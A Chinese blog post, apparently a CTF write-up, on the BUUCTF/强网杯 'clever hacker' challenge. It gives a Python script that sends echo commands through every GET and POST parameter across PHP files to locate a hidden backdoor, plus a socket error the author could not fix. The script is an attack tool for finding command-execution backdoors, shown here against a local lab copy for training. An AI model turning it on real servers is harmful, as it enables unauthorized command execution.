美文网首页
BUUCTF/强网杯 高明的黑客

BUUCTF/强网杯 高明的黑客

作者: Visianlee | 来源:发表于2019-06-17 21:53 被阅读0次

    访问/www.tar.gz得到源代码
    参考了别人的writeup,用wamp或者phpstudy搭建本地环境本地跑一下
    基本原理是暴力破解,把每个文件里可能成为真正参数的参数都跑一下,直到发现那个可以访问的参数为止
    那么如何测试?
    对于get:构造?[参数]=echo "xxx"
    对于post:构造data:{[参数]:=echo"xxx"}

    import os
    import re
    import requests as r
    
    files = os.listdir(r'C:\wamp\www\src')
    method = re.compile(r"\$_[GEPOST]{3,4}\[.*\]")#$_[GEPOST]{3,4}[.*]
    print(method)
    flag = 0
    for i in files:
        p = 'C:\\wamp\\www\\src\\' + i
        content = open(p, 'r', encoding='UTF-8').read()
        #print(i)
        #print(content)
        print('*' * 20 + i + '*' * 20)
        gepost = method.findall(content)
        #print(gepost)
        url = 'http://127.0.0.1/src/'
        cmd = '=echo "cryscat";'
        for j in gepost:
            if 'GET' in j:
                pdget = re.findall(r"'(.*)'", j)[0]
                urlg = url + i + '?' + pdget + cmd
                #print(urlg)
                res = r.get(urlg)
                print('------> ' + pdget)
                if 'cryscat' in res.text:
                    print('Success!!! ------> ' + urlg)
                    flag = 1
                    break
            if 'POST' in j:
                pdpost = re.findall(r"'(.*)'", j)[0]
                data = {
                    pdpost: cmd
                }
                urlp = url + i
                #print(urlp)
                res = r.post(urlp, data=data)
                print('------> ' + pdpost)
                if 'cryscat' in res.text:
                    print('Success!!! ------> ' + urlp + '  ' + data)
                    flag = 1
                    break
    
        if flag == 1:
            break
    

    代码应该没问题,但是从报错

    Traceback (most recent call last):
      File "C:\Python36\lib\site-packages\urllib3\connection.py", line 141, in _new_conn
        (self.host, self.port), self.timeout, **extra_kw)
      File "C:\Python36\lib\site-packages\urllib3\util\connection.py", line 83, in create_connection
        raise err
      File "C:\Python36\lib\site-packages\urllib3\util\connection.py", line 73, in create_connection
        sock.connect(sa)
    OSError: [WinError 10048] 通常每个套接字地址(协议/网络地址/端口)只允许使用一次。
    

    找了一圈也没解决,linux下没有测试,求大佬帮助。

    参考文章:
    https://hachp1.github.io/posts/Web%E5%AE%89%E5%85%A8/20190530-19qwb.html
    https://blog.csdn.net/qq_26406447/article/details/90690453
    https://mochazz.github.io/2019/05/27/2019%E5%BC%BA%E7%BD%91%E6%9D%AFWeb%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/
    http://cdusec.happyhacking.top/?post=77
    https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2

    相关文章

      网友评论

          本文标题:BUUCTF/强网杯 高明的黑客

          本文链接:https://www.haomeiwen.com/subject/lcuzfctx.html